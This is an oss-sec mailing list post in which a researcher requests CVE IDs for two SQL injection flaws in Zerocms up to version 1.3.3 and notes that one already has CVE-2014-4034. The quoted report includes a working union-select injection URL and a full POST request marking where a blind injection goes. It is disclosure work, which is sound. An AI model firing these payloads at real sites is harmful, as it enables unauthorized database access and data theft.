oss-sec mailing list archives
Re: CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities
From: Steffen Rösemann <steffen.roesemann1986 () gmail com>
Date: Sun, 1 Feb 2015 15:49:16 +0100
I just got a reply from MITRE. I missed, that the first SQL injection vulnerability already had been assigned CVE-2014-4034. Sorry, I missed that one. Greetings. Steffen 2015-02-01 9:15 GMT+01:00 Steffen Rösemann <steffen.roesemann1986 () gmail com> :
Hi Steve, Josh, vendors, list. I found two SQL injection vulnerabilities in Zerocms <= v. 1.3.3. The first SQL injection vulnerability is located in the article_id parameter used in zero_view_article.php and can be exploited even by unauthenticated attackers. See the following exploit-example: http:// {TARGET}/views/zero_view_article.php?article_id=-1+union+select+database%28%29,2,version%28%29,user%28%29,5,6+--+ The second vulnerability is a Blind SQL injection an is located in the user_id parameter used in a POST request in zero_transact_user.php. An attacker can exploit this vulnerabilitiy in the administrative backend via the following POST request exploit-example: POST /views/zero_transact_user.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://{TARGET}/views/zero_user_account.php?user_id=2 Cookie: PHPSESSID=rirftt07h0dem8d48lujliuve6 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 91 name=user&email=user%40user.de&access_level=1&user_id=2 {SQL injection goes here}&action=Modify+Account Could you please assign a CVE-ID for this? Thank you very much. Greetings from Germany. Steffen Rösemann References: [1] http://aas9.in/zerocms/ [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-13.html [3] https://github.com/perezkarjee/zerocms/issues/3 [4] https://github.com/sroesemann/zerocms [5] https://twitter.com/sroesemann/status/559273548691546113 [6] http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-14.html [7] http://seclists.org/fulldisclosure/2015/Feb/4
Current thread:
- CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities Steffen Rösemann (Feb 01)
- Re: CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities cve-assign (Feb 01)
- Re: CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities Steffen Rösemann (Feb 01)